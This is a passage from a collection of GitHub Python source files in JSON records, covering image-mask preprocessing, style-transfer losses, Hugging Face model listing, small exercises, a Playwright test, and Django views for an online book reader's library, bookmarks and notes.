k\n row = p % height\n col = p // height\n label_arr[row, col] = label\n return label_arr\n\n\n def get_masks(file_list, labels):\n mask = np.zeros((len(file_list), 350, 525, 4), np.int8)\n for i, f in enumerate(file_list):\n for j, cat in enumerate(['Fish', 'Flower', 'Gravel', 'Sugar']):\n pixels = labels.loc[labels['Image_Label'] == f + '_' + cat, 'EncodedPixels'].values[0]\n if type(pixels) != str:\n mask[i, :, :, j] = np.zeros((350, 525), np.int8)\n else:\n pixel_arr = np.array([int(p) for p in pixels.split(' ')])\n class_mask = add_label(pixel_arr, (1400, 2100), 1)\n class_mask = transform.downscale_local_mean(class_mask, (4, 4))\n mask[i, :, :, j] = (class_mask > 0.5).astype(np.int8)\n return mask\n\n labels = pd.read_csv(os.path.join(base_dir, 'train.csv'))\n train_names = pd.read_csv(os.path.join(base_dir, 'train_data.csv'))['names'].values\n mask = get_masks(train_names, labels)\n np.save(os.path.join(output_dir_base, 'train_masks'), mask)\n calib_names = pd.read_csv(os.path.join(base_dir, 'calib_data.csv'))['names'].values\n mask = get_masks(calib_names, labels)\n np.save(os.path.join(output_dir_base, 'calib_masks'), mask)\n test_names = pd.read_csv(os.path.join(base_dir, 'test_data.csv'))['names'].values\n mask = get_masks(test_names, labels)\n np.save(os.path.join(base_dir, 'test_masks'), mask)\n","repo_name":"btrotta/kaggle-clouds","sub_path":"get_image_arrays.py","file_name":"get_image_arrays.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"40363328436","text":"from keras import backend as K\n\ndef feature_content_loss(content, output):\n \"\"\"\n Featue Representation loss function\n Encourages the output image to matche the feature responses of the original\n image\n content and output are feature representations of content image and output\n image respectively\n \"\"\"\n return K.sum(K.square(output - content))\n\n\ndef gram_matrix(x):\n \"\"\"\n The feature correlations are given by the\n Gram matrix, where G(l)ij is the inner product\n between the vectorised feature map i and j in layer l\n \"\"\"\n if K.image_dim_ordering() == 'th':\n features = K.batch_flatten(x)\n else:\n features = K.batch_flatten(K.permute_dimensions(x, (2, 0, 1)))\n\n return K.dot(features, K.transpose(features))\n\n\ndef style_reconstruction_loss(style, output, image_rows, image_cols):\n \"\"\"\n Style Reconstruction loss.Encourages to find another image that matches the style\n representation of the original image. This is done by minimising the mean-squared distance\n between the entries of the Gram matrix from the original image and the Gram matrix of the\n image to be generated.\n \"\"\"\n h, w, c = image_rows, image_cols, 3\n fac = (1.0) / float((2 * h * w * c) ** 2)\n loss = fac * K.sum(K.square(gram_matrix(output) - gram_matrix(style)))\n return loss\n\n\ndef variation_loss(x, img_nrows, img_ncols):\n \"\"\"\n Total variational loss. Encourages spatial smoothness\n in the output image.\n \"\"\"\n H, W = img_nrows, img_ncols\n if K.image_dim_ordering() == 'th':\n a = K.square(x[:, :, :H - 1, :W - 1] - x[:, :, 1:, :W - 1])\n b = K.square(x[:, :, :H - 1, :W - 1] - x[:, :, :H - 1, 1:])\n else:\n a = K.square(x[:, :H - 1, :W - 1, :] - x[:, 1:, :W - 1, :])\n b = K.square(x[:, :H - 1, :W - 1, :] - x[:, :H - 1, 1:, :])\n\n return K.sum(K.pow(a + b, 1.25))\n","repo_name":"makaveli10/NeuralStyleTransfer","sub_path":"NeuralStyleTransfer/Neural_Style/compute_loss.py","file_name":"compute_loss.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4643305241","text":"from transformers import AutoConfig, AutoModel\nfrom huggingface_hub import HfApi, ModelFilter\n\ndef get_model_information(model):\n\n print(\"Collecting information for model: {0}\".format(model.modelId))\n\n # Get the model configuration\n config = AutoConfig.from_pretrained(model.modelId)\n\n # Get the model architecture\n model_arch = AutoModel.from_pretrained(model.modelId)\n \n # Get the model size in bytes\n model_size_bytes = sum(p.numel() for p in model_arch.parameters() if p.requires_grad) * 4 # Assuming float32\n \n # Convert the model size to megabytes (MB)\n model_size_mb = model_size_bytes / (1024 ** 2)\n \n # Get the total number of model parameters\n num_params = sum(p.numel() for p in model_arch.parameters())\n\n info_dict={'date': model.lastModified, 'model size (MB)': model_size_mb, 'num params': num_params, 'model id': model.modelId}\n\n return info_dict\n \n\n\n\ndef retrieve_all_huggingface_models(filtering_language):\n \n api = HfApi()\n model_list = api.list_models(\n filter=ModelFilter(\n language=filtering_language\n )\n )\n model_list = list(model_list)\n \n return model_list\n\n\ndef group_models_by_year(model_list):\n year_dict = {}\n\n for model in model_list:\n year = int(model.lastModified.split('-')[0])\n if year not in year_dict.keys():\n year_dict[year] = []\n year_dict[year].append(model)\n \n\n for year in range(2025, 2014, -1):\n \n if year in year_dict:\n year_dict[year] = sorted(year_dict[year], key=lambda x: x.lastModified, reverse=True)\n\n print(\"### {} {}\\n\".format(year,len(year_dict[year])))\n \n print(\"| | | |\")\n print(\"|:--------:|:--------:|:--------:|\")\n cnt = 0\n for model in year_dict[year]:\n if cnt%3 ==0:\n print(\"|\",end='')\n print(\" {} |\".format(model.modelId), end='')\n if cnt%3 ==2:\n print(\"\")\n cnt += 1\n\n print(\"\\n\\n\")\n\n for year in range(2025, 2014, -1):\n\n if year in year_dict:\n\n print(\"year : {} count: {}\".format(year, len(year_dict[year])))\n \n\n\nfiltering_language = \"code\"\nmodel_list = retrieve_all_huggingface_models(filtering_language)\ngroup_models_by_year(model_list)\n","repo_name":"gai4se/LLM4SE","sub_path":"scripts/code_model_info.py","file_name":"code_model_info.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"81"} +{"seq_id":"18245204253","text":"n=int(input())\ntemp=n\na=0\nwhile temp:\n a+=1\n temp//=10\nb=n\nsum=0\nwhile n:\n sum+=(n%10)**a\n n//=10\n a-=1\nif sum==b:\n print(True)\nelse:\n print(False)","repo_name":"21MH1A05B6/codemind-python","sub_path":"Disarium_number.py","file_name":"Disarium_number.py","file_ext":"py","file_size_in_byte":168,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"26686402815","text":"from playwright.sync_api import Request\n\n\ndef test_event_expect_request(login, page):\n def track_request_once(request: Request):\n print(\"Request sent: \" + request.url)\n\n page.goto(\"/\")\n page.once(\"request\", track_request_once)\n page.get_by_role(\"button\", name=\"refresh stats\").click() # page.once() tracks request\n page.reload()\n page.get_by_role(\"button\", name=\"refresh stats\").click() # however second time won't work\n page.goto(\"/tests\")\n","repo_name":"half-tested/playwright-python","sub_path":"tests/11_events/test_03_adding_one_off_event_listener.py","file_name":"test_03_adding_one_off_event_listener.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"36628521590","text":"cities = {'Seoul': {'country': 'Korea',\n 'population': '9988000',\n 'fact': 'Seoul is highly urbanized and has little green space'},\n\n 'Manila': {'country': 'Philippines',\n 'population': '1780000',\n 'fact': 'It is the capital of the Philippines.'},\n\n 'New York': {'country': 'USA',\n 'population': '8468000',\n 'fact': 'It is the most linguistically diverse city in the world.'}\n}\n\nfor city, info_dict in cities.items():\n print(city)\n for category, info in info_dict.items():\n print(category + \": \" + info)\n print(\"\\n\")\n ","repo_name":"SenpaiEggpie-acad/Deep-Learning-BWF-Nils-Santos","sub_path":"Task6/Chap6-Exercise11.py","file_name":"Chap6-Exercise11.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74726462344","text":"from django.urls import path\nfrom . import views\n\napp_name = 'interview_organizer'\n\nurlpatterns = [\n #Home page\n path('', views.index, name='index'),\n #Upcoming interviews\n path('upcoming/', views.upcoming, name='upcoming'),\n #Interview archive\n path('archive/', views.archive, name='archive'),\n #Page for single interview\n path('interviews//', views.interview, name='interview'),\n # Page for questions of an interview\n path('interviews//questions/', views.questions, name='questions'),\n path('new_interview/', views.new_interview, name='new_interview'),\n path('interviews//edit/', views.edit_interview, name='edit_interview'),\n path('delete_interview//', views.delete_interview, name='delete_interview'),\n]","repo_name":"PikkuJanne/interview_organizer_git","sub_path":"interview_organizer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23727763281","text":"# -*- coding: utf-8 -*-\n\"\"\"Installer for the imio.project package.\"\"\"\n\nfrom setuptools import find_packages\nfrom setuptools import setup\n\n\nlong_description = (\n open('README.rst').read()\n + '\\n' +\n 'Contributors\\n'\n '============\\n'\n + '\\n' +\n open('CONTRIBUTORS.rst').read()\n + '\\n' +\n open('CHANGES.rst').read()\n + '\\n')\n\n\nsetup(\n name='imio.project.core',\n version='1.3.2.dev0',\n description=\"Project management\",\n long_description=long_description,\n # Get more from http://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n \"License :: OSI Approved :: GNU General Public License (GPL)\",\n \"Environment :: Web Environment\",\n \"Framework :: Plone\",\n \"Framework :: Plone :: 4.3\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2.7\",\n ],\n keywords='',\n author='IMIO',\n author_email='dev@imio.be',\n url='http://pypi.python.org/pypi/imio.project.core',\n license='GPL',\n packages=find_packages('src', exclude=['ez_setup']),\n namespace_packages=['imio', 'imio.project'],\n package_dir={'': 'src'},\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'Plone',\n 'collective.contact.core',\n 'collective.contact.plonegroup',\n 'collective.dexteritytextindexer',\n 'collective.z3cform.chosen',\n 'collective.z3cform.datagridfield',\n 'dexterity.localrolesfield',\n 'plone.app.dexterity',\n 'plone.app.lockingbehavior',\n 'plone.app.versioningbehavior',\n 'plone.principalsource',\n 'plone.formwidget.datetime',\n 'setuptools',\n 'Products.PluggableAuthService>=1.11.3',\n ],\n extras_require={\n 'test': [\n 'plone.app.testing',\n ],\n },\n entry_points=\"\"\"\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\",\n)\n","repo_name":"IMIO/imio.project.core","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2032098210","text":"# coding=utf-8\n\"\"\"\n Created by Abadie Moran at 28/06/2019\n\n\"\"\"\nfrom source.parser.inside import inside_parse\n\n\ndef replace_pattern(html_code, folder, pattern):\n \"\"\"\n Remove external dependencies of the img/css/js code\n :param pattern: the pattern code for the css or the js\n :type pattern: CodePattern\n :param html_code: the html code to change\n :type html_code: str\n :param folder: the folder of the html file\n :type folder: str\n :return: the updated code\n :rtype: str\n\n Examples :\n\n # css\n pattern = CodePattern(CodePattern.CSS)\n code = ''\n replace_pattern(code, \"/home/path\"/, pattern)\n >> \n\n # js\n pattern = CodePattern(CodePattern.SCRIPT)\n code = ''\n replace_pattern(code, \"/home/path/\", pattern)\n >> \n\n # img\n pattern = CodePattern(CodePattern.IMG)\n code = ''\n replace_pattern(code, \"/home/path/\", patter,)\n >> \n\n \"\"\"\n # 1. Split \r\n \r\n \r\n \r\n Title\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n \"\"\")\r\n if useremail and userpwd in data:\r\n print(\"\"\"\r\n Update Password\r\n

{}

\r\n \r\n \r\n \r\n \r\n \r\n \r\n \"\"\".format(data))\r\n\r\n for data in products:\r\n print(\"\"\"\r\n \r\n \r\n \r\n \r\n \r\n \"\"\".format(data['name'], data['price'], data['img']))\r\n\r\n print(\"\"\"\r\n
Product NameProduct PriceProduct Image

Name : {}

Price : {}

\"image\"
\r\n \"\"\")\r\n\r\n else:\r\n print(\"\"\"\r\n

Login Failed

\r\n \"\"\")\r\n\r\n print(\"\"\"\r\n \r\n \r\n \"\"\")\r\n\r\ndef checkLogin():\r\n data = list()\r\n query = \"SELECT * FROM users WHERE userEmail = %s AND userPwd = %s\"\r\n cursor.execute(query, (useremail,userpwd))\r\n for data in cursor:\r\n pass\r\n login(data)\r\n\r\ncheckLogin()","repo_name":"brainmentorspvtltd/PythonTPDDL","sub_path":"Day-16/cgi-bin/login_2.py","file_name":"login_2.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41861238734","text":"import os\nimport subprocess\nfrom pathlib import Path\n\nPROJECT_ROOT = project_root = Path(__file__).parents[4]\n\n\ndef run_cmd(args: list[str], **kwargs) -> subprocess.CompletedProcess:\n \"\"\"\n Run the given command and return the completed process.\n\n All commands are executed from the working directory of the project root.\n\n All keyword arguments are forwarded to ``subprocess.run``. If the ``env``\n keyword argument is provided, it will be merged into the system environment\n variables before forwarding.\n\n :param args: the argument vector to execute\n :param kwargs: keyword arguments to forward to ``subprocess.run``\n :return: the completed process, irrespective of success or failure\n \"\"\"\n\n proc = subprocess.run(\n args,\n cwd=PROJECT_ROOT,\n capture_output=True,\n text=True,\n encoding=\"utf-8\",\n env=os.environ.copy() | kwargs.pop(\"env\", {}),\n **kwargs,\n )\n if proc.returncode != 0:\n print(proc.stdout)\n print(proc.stderr)\n return proc\n","repo_name":"dhruvkb/pls","sub_path":"examples/src/examples/utils/sub.py","file_name":"sub.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":587,"dataset":"github-code","pt":"78"} +{"seq_id":"18933801078","text":"\"\"\"\nGiven an integer array nums sorted in non-decreasing order and an integer target, return true if target is a majority element, or false otherwise.\n\nA majority element in an array nums is an element that appears more than nums.length / 2 times in the array.\n\n\n\nExample 1:\n\nInput: nums = [2,4,5,5,5,5,5,6,6], target = 5\nOutput: true\nExplanation: The value 5 appears 5 times and the length of the array is 9.\nThus, 5 is a majority element because 5 > 9/2 is true.\n\nExample 2:\n\nInput: nums = [10,100,101,101], target = 101\nOutput: false\nExplanation: The value 101 appears 2 times and the length of the array is 4.\nThus, 101 is not a majority element because 2 > 4/2 is false.\n\n\nConstraints:\n\n1 <= nums.length <= 1000\n1 <= nums[i], target <= 10^9\nnums is sorted in non-decreasing order.\n\"\"\"\n\n\nclass Solution:\n def isMajorityElement(self, nums: List[int], target: int) -> bool:\n hmap = {}\n for num in nums:\n if num not in hmap:\n hmap[num] = 1\n else:\n hmap[num] += 1\n if target in hmap:\n return hmap[target] > len(nums)//2\n return False","repo_name":"prateetishah/Leetcode-Solutions","sub_path":"1150. Check If a Number Is Majority Element in a Sorted Array/1150. Check If a Number Is Majority Element in a Sorted Array.py","file_name":"1150. Check If a Number Is Majority Element in a Sorted Array.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8827656690","text":"import pymysql\nimport db\nfrom env import *\n\nclass MySqlDB(db.DB):\n\tdef __init__(self, is_master=False):\n\t\tself.is_master = is_master\n\n\tdef connect(self):\n\t\tinf = conf[\"mysql\"]\n\n\t\tcondb = inf[\"db\"]\n\t\tif self.is_master == False:\n\t\t\tif conf[\"is_test\"]:\n\t\t\t\tcondb = inf[\"test_db\"]\n\n\t\tconn = pymysql.connect(\n\t\t\t\thost = inf[\"host\"],\n\t\t\t\tdb = condb,\n\t\t\t\tuser = inf[\"user\"],\n\t\t\t\tpasswd = inf[\"password\"],\n\t\t\t\tcharset = \"utf8\",\n\t\t\t\tlocal_infile = 1\n\t\t)\n\t\tconn.autocommit(True)\n\t\treturn conn\n\n\tdef execSql(self, sql):\n\t\tcur = None\n\t\ttry:\n\t\t\tcur = self.connect().cursor()\n\t\t\tcur.execute(sql)\n\t\t\treturn cur\n\t\texcept:\n\t\t\tif cur: cur.close()\n\t\t\tprint(sql)\n\t\t\traise\n\n\tdef truncateTable(self, tablename):\n\t\tsql = \"truncate table %s;\" % tablename\n\t\treturn self.execSql(sql)\n\t\t\n\tdef countTable(self, tablename, whereList=[]):\n\t\tif self.tableExists(tablename) == False:\n\t\t\treturn 0\n\t\tstrwhere = \"\"\n\t\tif len(whereList) > 0:\n\t\t\tstrwhere = \"where %s\" % (\" and \".join(whereList))\n\t\tsql = \"select count(*) as cnt from %s %s\" % (tablename, strwhere)\n\t\tcur = self.execSql(sql)\n\t\trow = cur.fetchone()\n\t\tcur.close()\n\t\treturn row[0]\n\n\tdef close(self):\n\t\tif self.conn != None:\n\t\t\tself.conn.close()\n\n\tdef _createTableFromTemplate(self, sqlFile, tableName, replaces={}):\n\t\ttry: \n\t\t\tf = open(sqlFile, \"r\")\n\t\t\tsql = f.read()\n\t\t\tsql = sql.replace(\"#TABLENAME#\", tableName)\n\t\t\tfor k in replaces.keys():\n\t\t\t\tsql = sql.replace(k, replaces[k])\n\t\t\tf.close()\n\t\t\tcur = self.execSql(sql)\n\t\t\tcur.close()\n\t\texcept:\n\t\t\traise\n\n\tdef createTable(self, tableName, templateName=\"\", replaces={}):\n\t\tif templateName != \"\":\n\t\t\tself._createTableFromTemplate(\"%s/create_table_%s.sql\" % (SQL_DIR, \n templateName), tableName, replaces)\n\t\telse:\n\t\t\tself._createTableFromTemplate(\"%s/create_table_%s.sql\" % (SQL_DIR, \n tableName), tableName)\n\t\n\tdef tableExists(self, tableName):\n\t\tif conf[\"is_test\"]:\n\t\t\tcondb = conf[\"mysql\"][\"test_db\"]\n\t\telse:\n\t\t\tcondb = conf[\"mysql\"][\"db\"]\n\t\tsql = \"\"\"SELECT count(*) \nFROM information_schema.TABLES \nWHERE (TABLE_SCHEMA = '%s') AND (TABLE_NAME = '%s');\n\"\"\" % (condb, tableName)\n\t\t(cnt,) = self.select1rec(sql)\n\t\tif cnt > 0:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\n\tdef dropTable(self, tableName):\n\t\tself.execSql(\"drop table if exists %s;\" % tableName)\n\n\tdef select1rec(self, sql):\n\t\tcur = self.execSql(sql)\n\t\trow = cur.fetchone()\n\t\tcur.close()\n\t\tif row:\n\t\t\treturn row\n\t\treturn None\n\n\tdef select1value(self, tableName, field, whereList):\n\t\tstrwhere = \"\"\n\t\tstrwhere = \"where %s\" % (\" and \".join(whereList))\n\t\tsql = \"select %s as cnt from %s %s\" % (field, tableName, strwhere)\n\t\trow = self.select1rec(sql)\n\t\tif row:\n\t\t\t(val,) = row\n\t\t\treturn val\n\t\treturn None\n\ndef execSql(sql):\n\treturn MySqlDB().execSql(sql)","repo_name":"toku463ne/stockAnalyzer","sub_path":"db/mysql.py","file_name":"mysql.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70803462011","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.models import User\nfrom django.contrib import auth, messages\nfrom apps.atendimento.models import AtendimentoPretoVelho\nfrom apps.usuario.models import Consulente\nfrom .forms import LoginForm, CadastroForm\n\ndef cadastro(request):\n form = CadastroForm\n if request.method == 'POST':\n form = CadastroForm(request.POST)\n if form.is_valid():\n nome = form.cleaned_data['nome']\n email = form.cleaned_data['email']\n senha = form.cleaned_data['senha']\n user = User.objects.create_user(username=nome, email=email, password=senha)\n user.save()\n consulente = Consulente.objects.filter(email=email).first()\n if consulente:\n consulente.usuario = user\n consulente.save()\n return redirect('login')\n \n context = { 'form': form }\n return render(request,'usuario/cadastro.html', context)\n\ndef login(request):\n form = LoginForm\n if request.method == 'POST':\n form = LoginForm(request.POST)\n if form.is_valid():\n email = form.cleaned_data['email']\n senha = form.cleaned_data['senha']\n nome = User.objects.filter(email=email).values_list('username', flat=True).get()\n user = auth.authenticate(request, username=nome, password=senha)\n if user is not None:\n auth.login(request, user)\n return redirect('dashboard')\n else:\n messages.error(request,'Senha incorreta.')\n \n context = {'form': form}\n return render(request, 'usuario/login.html', context)\n\ndef logout(request):\n auth.logout(request)\n return redirect('dashboard')\n\ndef dashboard(request):\n if request.user.is_authenticated:\n consulente = Consulente.objects.filter(usuario=request.user).first()\n atendimentos = AtendimentoPretoVelho.objects.filter(consulente=consulente)\n\n context = { \n 'atendimentos': atendimentos\n }\n return render(request, 'usuario/dashboard.html', context)\n else:\n return redirect('login')\n\n\ndef campo_vazio(campo):\n return not campo.strip()\n\ndef senhas_nao_sao_iguais(senha, senha2):\n return senha != senha2","repo_name":"tyagonunes/ohana","sub_path":"apps/usuario/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"756704360","text":"from django.contrib.auth.models import User, Group\nfrom django.shortcuts import render\nfrom django.views import generic\nfrom reader.models import BooksIssued, Note, Highlight, BookMark, Book\nfrom reader.serializers import UserSerializer\nfrom django.utils import timezone\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect,HttpResponse, HttpResponseNotFound\nfrom login.models import ExtendedUser\nimport sys, os, re\nimport simplejson as json\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.parsers import JSONParser\nfrom reader.serializers import UserSerializer, BooksIssuedSerializer, BookSerializer\nfrom rest_framework.permissions import IsAuthenticated, AllowAny\nfrom rest_framework.authentication import TokenAuthentication, BasicAuthentication\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.decorators import api_view, authentication_classes, permission_classes\nfrom rest_framework import status\nfrom rest_framework import generics\n\n# Create your views here.\n\nclass MyProfile(generic.ListView):\n\tcontext_object_name = 'data'\n\n\tdef get_template_names(self):\n\t\trequest = self.request\n\t\ttemplate_name = 'profile.html'\n\t\treturn [template_name]\n\n\tdef get_queryset(self, **kwargs):\n\t\trequest = self.request\n\t\tuser = request.user\n\t\tcontext = {}\n\t\tissuedBooks = []\n\t\tuserIssuedBooks = BooksIssued.objects.filter(user=user)\n\t\tfor booking in userIssuedBooks:\n\t\t\tbook = Book.objects.get(id=booking.book_id)\n\t\t\tissuedBooks.append(book)\n\t\tcontext['issuedBooks'] = issuedBooks\n\t\treturn context\n\nclass MyLibrary(generic.ListView):\n\tcontext_object_name = 'data'\n\n\tdef get_template_names(self):\n\t\trequest = self.request\n\t\ttemplate_name = 'my_library.html'\n\t\treturn [template_name]\n\n\tdef get_queryset(self, **kwargs):\n\t\trequest = self.request\n\t\tuser = request.user\n\t\tif hasattr(request.user,'extendeduser'):\n\t\t\tpass\n\t\telif user.socialaccount_set.all():\n\t\t\tsocial_set = user.socialaccount_set.all()[0]\n\t\t\tif not (ExtendedUser.objects.filter(user_id = user.id)):\n\t\t\t\tif social_set.provider == 'facebook':\n\t\t\t\t\tfacebook_data = social_set.extra_data\n\t\t\t\t\tprint('****************************')\n\t\t\t\t\tprint(facebook_data)\n\t\t\t\t\tprint('****************************')\n\t\t\t\t\timg_url = \"https://graph.facebook.com/{}/picture?width=140&&height=140\".format(facebook_data.get('id',''))\n\t\t\t\t\textendedUser = ExtendedUser(user=user, imageUrl = img_url)\n\t\t\t\t\textendedUser.save()\n\t\tcontext = {}\n\t\tissuedBooks = []\n\t\tuserIssuedBooks = BooksIssued.objects.filter(user=user)\n\t\tfor booking in userIssuedBooks:\n\t\t\tbook = Book.objects.get(id=booking.book_id)\n\t\t\tissuedBooks.append(book)\n\t\tcontext['issuedBooks'] = issuedBooks\n\t\treturn context\n\n# Create your views here.\nclass CentralLibrary(generic.ListView):\n\tcontext_object_name = 'data'\n\n\tdef get_template_names(self):\n\t\trequest = self.request\n\t\ttemplate_name = 'central_library.html'\n\t\treturn [template_name]\n\n\tdef get_queryset(self, **kwargs):\n\t\trequest = self.request\n\t\tuser = request.user\n\t\tcontext = {}\n\t\tissuedBooks = []\n\t\tbookList = Book.objects.all()\n\t\tcontext['books'] = [book for book in bookList]\n\t\treturn context\n\nclass IssueBookView(generic.ListView):\n\ttemplate_name = 'central_library.html'\n\tdef get_queryset(self):\n\t\tcontext = {}\n\t\treturn context\n\n\tdef post(self,request,*args,**kwargs):\n\t\ttry:\n\t\t\tmessage = {}\n\t\t\trequest = self.request\n\t\t\tuser = request.user\n\t\t\talreadyIssuedBooksCount = BooksIssued.objects.filter(user=user).count()\n\t\t\tif(alreadyIssuedBooksCount == 3):\n\t\t\t\tmessage['success'] = 'You already have 3 books issued. First return a book from MyLibrary to continue'\n\t\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\n\t\t\tbookId = int(request.POST.get('bookId',''))\n\t\t\tbookToIssue = Book.objects.get(pk=bookId)\n\n\t\t\tif bookToIssue:\n\t\t\t\tissuedBooks, created = BooksIssued.objects.get_or_create(user=user, book=bookToIssue)\n\t\t\telse:\n\t\t\t\tmessage['success'] = 'Error occured while issuing book'\n\t\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\n\t\t\tif created:\n\t\t\t\tmessage['success'] = 'Book is successfully issued'\n\t\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\t\telse:\n\t\t\t\tmessage['success'] = 'This book is already issued to you.'\n\t\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\texcept:\n\t\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\t\tprint(' Exception occured in function %s() at line number %d of %s,\\n%s:%s ' % (exc_tb.tb_frame.f_code.co_name, exc_tb.tb_lineno, __file__, exc_type.__name__, exc_obj))\n\t\t\tmessage['success'] = 'Some error occured'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\nclass ReturnBookView(generic.ListView):\n\ttemplate_name = 'my_library.html'\n\tdef get_queryset(self):\n\t\tcontext = {}\n\t\treturn context\n\n\tdef post(self,request,*args,**kwargs):\n\t\ttry:\n\t\t\tmessage = {}\n\t\t\trequest = self.request\n\t\t\tuser = request.user\n\t\t\tbookId = int(request.POST.get('bookId',''))\n\t\t\tissuedBook = BooksIssued.objects.filter(user=user, book=bookId)\n\n\t\t\tif issuedBook:\n\t\t\t\tissuedBook.delete();\n\t\t\t\tmessage['success'] = 'Book returned successfully'\n\t\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\t\telse:\n\t\t\t\tmessage['success'] = 'Error in returning book'\n\t\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\texcept:\n\t\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\t\tprint(' Exception occured in function %s() at line number %d of %s,\\n%s:%s ' % (exc_tb.tb_frame.f_code.co_name, exc_tb.tb_lineno, __file__, exc_type.__name__, exc_obj))\n\t\t\tmessage['success'] = 'Some error occured'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\ndef getbook(request):\n\tmessage = {}\n\ttry:\n\t\tbookId = int(request.POST.get('bookId',''))\n\t\tif bookId:\n\t\t\tbookToRead = Book.objects.get(pk=bookId)\n\t\t\tbookUrl = str(bookToRead.bookEpub)\n\t\t\tbookUrl = '/media/books/'+bookUrl.split('/')[-1]\n\t\t\tmessage['bookUrl'] = bookUrl\n\t\t\tmessage['bookName'] = str(bookToRead.bookName)\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\telse:\n\t\t\tmessage['error'] = 'Error retrieving book info.'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\texcept:\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tprint(' Exception occured in function %s() at line number %d of %s,\\n%s:%s ' % (exc_tb.tb_frame.f_code.co_name, exc_tb.tb_lineno, __file__, exc_type.__name__, exc_obj))\n\t\tmessage['message'] = 'Some error occured'\n\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\ndef getbookmarks(request):\n\tmessage = {}\n\tbookMarks = []\n\ttry:\n\t\tuser = request.user\n\t\tbookId = int(request.POST.get('bookId',''))\n\t\tif bookId and user:\n\t\t\tbook = Book.objects.get(pk=bookId)\n\t\t\tuserBookmarks = BookMark.objects.filter(user=user, book=book)\n\t\t\tfor bookmark in userBookmarks:\n\t\t\t\tbookMarks.append({'bookMarkName':bookmark.bookmarkName, 'chapterHref':bookmark.chapterHref, 'pageCfi':bookmark.pageCfi})\n\t\t\tmessage['bookmarkList'] = bookMarks\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\telse:\n\t\t\tmessage['error'] = 'Error in retrieving Bookmarks.'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\texcept:\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tprint(' Exception occured in function %s() at line number %d of %s,\\n%s:%s ' % (exc_tb.tb_frame.f_code.co_name, exc_tb.tb_lineno, __file__, exc_type.__name__, exc_obj))\n\t\tmessage['message'] = 'Some error occured'\n\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\ndef getNotes(request):\n\tmessage = {}\n\tnotes = []\n\ttry:\n\t\tuser = request.user\n\t\tbookId = int(request.POST.get('bookId',''))\n\t\tif bookId and user:\n\t\t\tbook = Book.objects.get(pk=bookId)\n\t\t\tuserNotes = Note.objects.filter(user=user, book=book)\n\t\t\tfor note in userNotes:\n\t\t\t\tnotes.append({'noteText':note.text, 'chapterHref':note.chapterHref, 'pageCfi':note.pageCfi, 'wordRange':note.wordRange})\n\t\t\tmessage['noteList'] = notes\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\t\telse:\n\t\t\tmessage['error'] = 'Error in retrieving Notes.'\n\t\t\treturn HttpResponse(json.dumps(message), content_type='application/json')\n\texcept:\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tprint(' Exception occured in function %s() at line number %d of %s,\\n%s:%s ' % (exc_tb.tb_frame.f_code.co_name, exc_tb.tb_lineno, __file__, exc_type.__name__, 